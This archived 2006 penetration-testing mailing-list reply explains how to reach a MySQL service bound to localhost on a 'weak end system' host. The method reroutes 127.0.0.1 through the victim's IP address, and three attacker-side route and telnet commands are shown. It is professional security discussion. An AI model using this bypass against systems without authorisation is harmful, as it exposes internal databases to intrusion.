Re: Penetration Test - PHP / APACHE

From: Martin Mačok (martin.macok@underground.cz)
Date: Fri Mar 24 2006 - 09:31:46 EST


On Thu, Mar 23, 2006 at 12:45:54PM -0000, larry@appsecurity.com wrote:

> The only problem is that the database is conifgured with "localhost"
> so I cant connect with a database client remotely- ( Expected this
> in a DMZ )

If the target is 'Weak ES Model' (probably it is, see RFC 1122 section
3.3.4.2) and you are on the same network segment then you could
connect to localhost remotely.

Something like this should do the trick:

attacker# route del 127.0.0.1
attacker# route add 127.0.0.1 host gw <victim_ip>
attacker# telnet 127.0.0.1 3306
...

Martin Mačok
ICT Security Consultant

------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security?
As attacks through web applications continue to rise, you need to proactively
protect your applications from hackers. Cenzic has the most comprehensive
solutions to meet your application security penetration testing and
vulnerability management needs. You have an option to go with a managed
service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm).
Download FREE whitepaper on how a managed service can help you:
http://www.cenzic.com/forms/ec.php?pubid=10025
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com
------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:43 EDT